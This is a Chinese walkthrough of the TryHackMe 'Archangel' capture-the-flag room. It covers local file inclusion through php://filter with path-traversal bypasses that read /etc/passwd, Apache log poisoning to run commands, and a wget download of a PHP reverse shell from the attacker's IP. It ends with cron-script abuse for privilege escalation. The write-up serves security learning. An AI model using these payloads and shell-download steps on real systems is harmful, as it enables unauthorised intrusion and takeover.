其他分享
首页 > 其他分享> > TryHackMe - Archangel靶场

TryHackMe - Archangel靶场

作者:互联网

Archangel

Boot2root, Web exploitation, Privilege escalation, LFI


0x01 信息收集

常规端口扫一波,发现只有22和80端口开放   先从80端口入手,常规的扫目录没有发现有价值的东西   在源代码里发现一个可以的域名   网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag   在用gobuster扫描网站目录,得到test.php和robots.txt robots.txt里面指的也是test.php  

0x02 文件包含

打开test.php看路径像是有文件包含的漏洞   用php伪协议包含到test.php文件 php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 分析源代码if需要满足两个条件没有../..和 /var/www/html/development_testing   根据条件读取/etc/passwd php://filter/resource=/var/www/html/development_testing/..//..//..//..//..//..//..//..//..//..//..//etc/passwd 也可以用.././.././绕过 ..%2f/..%2f/..%2f/也能绕过   尝试包含apache日志getshell   在User-Agent里插入phpinfo函数测试一下   成功解析

 

0x03 GetShell

插入system执行命令函数   给cmd传参成功执行,接下来就是用kali自带的php反向shell脚本getshell   修改文件的反向链接的地址和端口   用python3搭建一个简单的网站 python3 -m http.server 4444 执行函数用wget 下载脚本 wget http://10.10.220.123:4444/php-serverse-shell.php   下载成功后在同级目录下访问php-reverse-shell.php 访问前记得先用nc起监听  

0x04 权限提升

shell过来后准备提权,现先翻一下可以提权的脚本,发现/etc/crontab目录下有helloworld.sh以archanggel用户自动运行的脚本   过去看下是个自动运行的sh文件,具有可读可写权限。在文件后面添加反弹shell的命令。   稍等片刻便能获得archangel权限

标签:文件,Archangel,shell,..,端口,test,靶场,php,TryHackMe
来源: https://blog.csdn.net/qq_44101248/article/details/113957607